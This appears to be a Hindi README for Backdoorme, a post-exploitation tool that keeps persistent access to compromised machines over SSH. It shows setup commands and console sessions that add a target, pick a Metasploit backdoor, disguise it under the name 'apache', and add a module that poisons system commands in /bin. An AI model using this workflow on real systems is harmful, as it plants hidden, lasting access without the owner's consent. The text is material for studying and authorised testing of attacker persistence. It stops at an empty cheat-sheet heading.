
शक्तिशाली स्वचालित बैकडोरिंग उपयोगिता
मेटास्प्लोइट जैसे उपकरण कंप्यूटरों का शोषण करने के लिए बहुत अच्छे हैं, लेकिन कंप्यूटर तक पहुंच प्राप्त करने के बाद क्या होता है? Backdoorme इस प्रश्न का उत्तर बैकडोर की एक श्रृंखला जारी करके देता है ताकि लंबे समय तक स्थायित्व स्थापित किया जा सके।
एक बार लक्ष्य के साथ SSH कनेक्शन स्थापित होने के बाद, Backdoorme की क्षमताएं सफल हो सकती हैं। दुर्भाग्य से, Backdoorme रूट एक्सेस प्राप्त करने का उपकरण नहीं है – केवल एक बार प्राप्त एक्सेस को बनाए रखता है।
कृपया Backdoorme का उपयोग केवल स्पष्ट अनुमति से करें – कृपया बिना पूछे हैक न करें।
Backdoorme दो भागों में विभाजित है: बैकडोर और मॉड्यूल।
बैकडोर कोड के छोटे टुकड़े होते हैं जो एक पोर्ट पर सुनते हैं और एक इंटरप्रेटर, जैसे bash, पर रीडायरेक्ट करते हैं। विभिन्न भाषाओं में कई बैकडोर लिखे गए हैं ताकि विविधता मिल सके।
मॉड्यूल बैकडोर को और अधिक प्रभावी बनाते हैं, उदाहरण के लिए, हर कुछ मिनटों में या जब भी कंप्यूटर बूट होता है, उन्हें चलाकर। यह स्थायित्व स्थापित करने में मदद करता है।
प्रदर्शन:
Backdoorme शुरू करने के लिए, पहले सुनिश्चित करें कि आपके पास आवश्यक निर्भरताएं हैं।
Python 3.5+ के लिए:
$ sudo apt-get install python3 python3-pip python3-tk nmap
$ cd backdoorme/
$ virtualenv --python=python3.5 env
$ source env/bin/activate
(env) $ pip install -r requirements.txt
Python 2.7 के लिए:
$ sudo python dependencies.py
Backdoorme लॉन्च करना:
$ python master.py
एक लक्ष्य जोड़ने के लिए:
>> addtarget
Target Hostname: 10.1.0.2
Username: victim
Password: password123
+ Target 1 Set!
>>
एक बैकडोर का उपयोग करने के लिए, बस "use" कीवर्ड चलाएं।
>> use shell/metasploit
+ Using current target 1.
+ Using Metasploit backdoor...
(msf) >>
वहां से, आप बैकडोर से संबंधित विकल्प सेट कर सकते हैं। कॉन्फ़िगर किए जा सकने वाले पैरामीटरों की सूची देखने के लिए "show options" या "help" चलाएं। एक विकल्प सेट करने के लिए, बस "set" कीवर्ड का उपयोग करें।
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name initd name of the backdoor False
...
(msf) >> set name apache
+ name => apache
(msf) >> show options
Backdoor options:
Option Value Description Required
------ ----- ----------- --------
name apache name of the backdoor False
...
जैसे metasploit में, बैकडोर श्रेणी के अनुसार व्यवस्थित होते हैं।
प्रत्येक बैकडोर में अतिरिक्त मॉड्यूल लागू करने की क्षमता होती है ताकि बैकडोर और अधिक प्रभावी हो सके। मॉड्यूल जोड़ने के लिए, बस "add" कीवर्ड का उपयोग करें।
(msf) >> add poison
+ Poison module added
प्रत्येक मॉड्यूल में अतिरिक्त पैरामीटर होते हैं जिन्हें अनुकूलित किया जा सकता है, और यदि "help" फिर से चलाया जाता है, तो आप कोई अतिरिक्त विकल्प देख या सेट कर सकते हैं।
(msf) >> help
...
Poison module options:
Option Value Description Required
------ ----- ----------- --------
name ls name of command to poison False
location /bin where to put poisoned files into False
वर्तमान में सक्षम मॉड्यूल में शामिल हैं:
Backdoorme एक साथ कई अलग-अलग लक्ष्यों का समर्थन करता है, जो प्रवेश करने पर संख्या के अनुसार व्यवस्थित होते हैं। कोर एक "वर्तमान" लक्ष्य बनाए रखता है, जिस पर कोई भी नया बैकडोर डिफ़ॉल्ट होगा। मैन्युअल रूप से लक्ष्य स्विच करने के लिए, बस कमांड के बाद लक्ष्य संख्या जोड़ें: "use metasploit 2" दूसरे लक्ष्य के विरुद्ध मेटास्प्लोइट बैकडोर तैयार करेगा। वर्तमान लक्ष्यों की सूची देखने के लिए "list" चलाएं, चाहे कनेक्शन खुला हो या बंद, और कौन से बैकडोर और मॉड्यूल उपलब्ध हैं।
Backdoorme अभी भी अपनी प्रारंभिक अवस्था में है! परियोजना में योगदान करने के लिए स्वतंत्र महसूस करें – बस इसे फोर्क करें, अपने बदलाव करें, और एक पुल अनुरोध जारी करें। क्या आपके पास किसी किलर बैकडोर या किसी चीज़ के लिए विचार है जिसे हम सुधार सकते हैं? एक मुद्दा बनाएं और हम इसे ASAP जोड़ देंगे! कृपया किसी भी प्रश्न के लिए हमें [email protected] पर ईमेल करें।
यदि आप अपना खुद का बैकडोर जोड़ना चाहते हैं, तो backdoorme/backdoors/template.py फ़ाइल में दिए गए निर्देशों का पालन करें।
यदि आप अपना खुद का मॉड्यूल जोड़ना चाहते हैं, तो backdoorme/modules/template.py फ़ाइल में दिए गए निर्देशों का पालन करें।
डेवलपर्स के लिए चीट शीट: